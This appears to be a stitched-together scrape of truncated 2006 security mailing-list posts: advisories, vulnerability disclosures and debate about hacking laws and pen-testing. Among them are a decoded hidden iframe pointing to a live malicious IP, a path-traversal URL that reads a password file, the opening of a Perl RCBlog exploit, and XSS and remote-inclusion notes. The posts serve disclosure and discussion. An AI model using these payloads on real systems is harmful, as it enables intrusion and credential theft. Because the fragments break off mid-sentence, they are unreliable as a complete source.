Dear [EMAIL PROTECTED],
This is a case of 'real' stack structure overflow, not stack buffer
overflow (stack overrun) as you may think. The process's stack is
exhausted because of a recursive call. Exploitation of this situation to
execute code may be hard, if possible.
--
~/ZARAZA
Dear [EMAIL PROTECTED],
This piece of HTML has nothing to do with java. It has javascript.
Javascript generates equivalent of IFRAME SRC=http://63.134.215.88/a/;
height=0 width=0. It will not work for patched Outlook Express
because e-mail works in restricted hosts zone.
--Friday,
On Fri, 17 Feb 2006 [EMAIL PROTECTED] wrote:
I just received this exploit, I have looked around and all I could find
lately are the following Java issues: Gentoo Linux Security Advisory
GLSA 200601-10 - Sun and Blackdown Java: Applet privilege escalation
I don't have the Java knowledge to
ps, this decodes to the following HTML snippet (i have deliberately
obfuscated the tags):
[iframe src=http://63.134.215.88/a/ height=0 width=0][/iframe]
here's how i arrived at that. there's a free command line JavaScript
interpreter that can help with evaluating malicious javascript. i did the
With register_globals turned off none of these attacks are possible.
So is there going to be an update to fix the insecure code or is your
fix going to remain as so:
(register globals must be off to run dotproject)
/str0ke
On 2/15/06, Adam Donnison [EMAIL PROTECTED] wrote:
I responded to this
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:041
http://www.mandriva.com/security/
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:042
http://www.mandriva.com/security/
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:043
http://www.mandriva.com/security/
Ken Hollis (aka Gandalf) wrote:
Has anybody seen this before? I know that the mouseover issues ...
[FORM action=http://malicious/stuff]
[a href=https://trusted/site;]
[INPUT ...][/a]
Does not seem to be a mouseover issue, but seems identical to
Internet Explorer/Outlook Express
- Coppermine Photo Gallery = 1.4.3 arbitrary local/remote inclusion: -
- 18/02/2006 5.09.55 ---
software:
site: http://coppermine-gallery.net/index.php
Software: e107 CMS 0.7.2
Software Details: Chatbox Plugin v1.0
Class:Remote
Type: XSS
== Description ===
XSS vulnerability exists in e107 0.7.2 CMS.
user input is not correctly sanitized in Chatbox Plugin v1.0.
== Exploit =
Web Site : http://www.tasarimrehberi.com [Turkish Desing]
Description : index.php remote attack
Vulnerable ; http://www.site.com/index.php?sayfaadi=; and index.php?sayfa=
Patriotic Hackers!
Botan,B3g0k,Azad,Nistiman,Fesih :}
Freedom For Ocalan
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
OpenPKG Security AdvisoryThe OpenPKG Project
http://www.openpkg.org/security.html http://www.openpkg.org
[EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
OpenPKG Security AdvisoryThe OpenPKG Project
http://www.openpkg.org/security.html http://www.openpkg.org
[EMAIL PROTECTED]
#!/usr/bin/perl
#
# RCBlog 1.0.3 / 1.0.2
# Exploit by Hessam-x (www.hessamx.net)
# Name: RCBlog (www.fluffington.com
# version : 1.0.3 / 1.0.2
# manual exploiting:
# index.php?%20post=../config/password
#
use LWP::Simple;
print ---\n;
print =
##
# GulfTech Security ResearchFebruary 18, 2006
##
# Vendor : John Lim
# URL : http://adodb.sourceforge.net/
# Version : ADOdb = 4.71
# Risk : Cross Site Scripting
{}
{ [waraxe-2006-SA#045]
}
{}
{
My first vulnerability report :)
Description:
WPC.easy is a database generated website with a dynamic on-line
administration suite which allows for product updates, editing, deleting, image
upload and price changes. WPC.easy is powered by a Secure Database.
vendor:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200602-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
-
Fedora Legacy Update Advisory
Synopsis: Updated openssh packages fix security issues
Advisory ID: FLSA:168935
Issue date:2006-02-18
Product: Red Hat Linux, Fedora Core
Keywords:
-
Fedora Legacy Update Advisory
Synopsis: Updated squid package fixes security issues
Advisory ID: FLSA:152809
Issue date:2006-02-18
Product: Red Hat Linux, Fedora Core
Keywords:
In the following (quick dirty) write-up (which is too big for sending
into bugtraq) I start by discussing some recent threats network
operators should be aware of, such as recursive DNS attacks.
Also, a bit on the state of the Internet, cooperation across different
fields and how these latest
Hi all,
Secure Science's External Threat Assessment Team is issuing this malware
analysis report in an effort to shed light on emerging threats.
http://www.securescience.net/advisories/SSC_MSAT_FEB_02_2006-public.pdf
-Lance James
Secure Science Corp
www.securescience.net
Wow...this is definitely a big can of worms to open...
I both agree and disagree with your stance. Hopefully I'm caffeinated
enough to express my reasoning clearly.
While I don't feel like elaborating too much, my drive to become an
InfoSec professional was driven mostly by the hacker
Phishing through WinRAR 3.51
Credit to: Preben Nyløkken
Tested on version: 3.51
Vendors site: www.rarlabs.com
Vendor status: Tried contacting without luck.
Description:
Due to the build-up of WinRAR, some vital parts of the program's functions and
URLs are
Here here, Paul.
Worried your test network isn't real enough? Make it better! Throw in IDS,
patch management, whatever.
As Paul suggested, get your buddies involved. I've seen workshops where people
are designated attacker and defender, objectives are obvious.
If kids / pro's aren't smart
Advanced societies are updating computer crime laws faster than the
rest of the world. This means that new generations of these more
advanced societies will have no clue about how remote computer attacks
are carried out. Future generations of security experts will be among
the most
Marcus,
You use the analogy of trespassing to describe unauthorized access to a
computer system or its resources. I agree with you but I think a point
was missed...
The laws being passed today against *cyber crime* far exceed the basic
property laws. If someone gains access to a system he
I would have to say that I agree with you in what you have said. I am a
young security professional with a cissp, but growing up I did not have the
$ to be able to purchase vmware and all the software to setup a test
environment. I also bet that most of you between ages 12 - 16 had the
minimum
Marcus J. Ranum [EMAIL PROTECTED] wrote:
If you're trying to understand the security properties of a
system by breaking into it, you're not producing valuable
reports, anyhow. All you are doing is telling them where
to put the next band-aid.
I know of too many (more than none is too many)
nuqneH,
I'd even say, if you hire someone whose security knowledge is based solely
on breaking into systems, this guy will not be able to produce valuable reports
for customers because his viewpoint is likely to be flawed; his knowledge on
protecting system usually falls into patch-this-hole
Paul,
On 2006-02-15 Paul Schmehl wrote:
--On Saturday, February 11, 2006 16:35:20 + [EMAIL PROTECTED] wrote:
New generations of teenagers will be scared of doing online
exploration. I'm not talking about damaging other companies' computer
systems. I'm talking about accessing them
That's not crashing my fully updated Internet Explorer. Just the Crash text is
flashing in that example but my Internet Explorer keeps working properly. Am I
missing something?
Gadi Evron wrote:
The first worm (mass mailer) to (ab)use the WMF 0day is now spreading in
Australia.
Respectfully speaking:
There are a few corrections to this that need to be expressed.
The language you're using describing it as a mass-mailing worm is coming
off confusing to some. The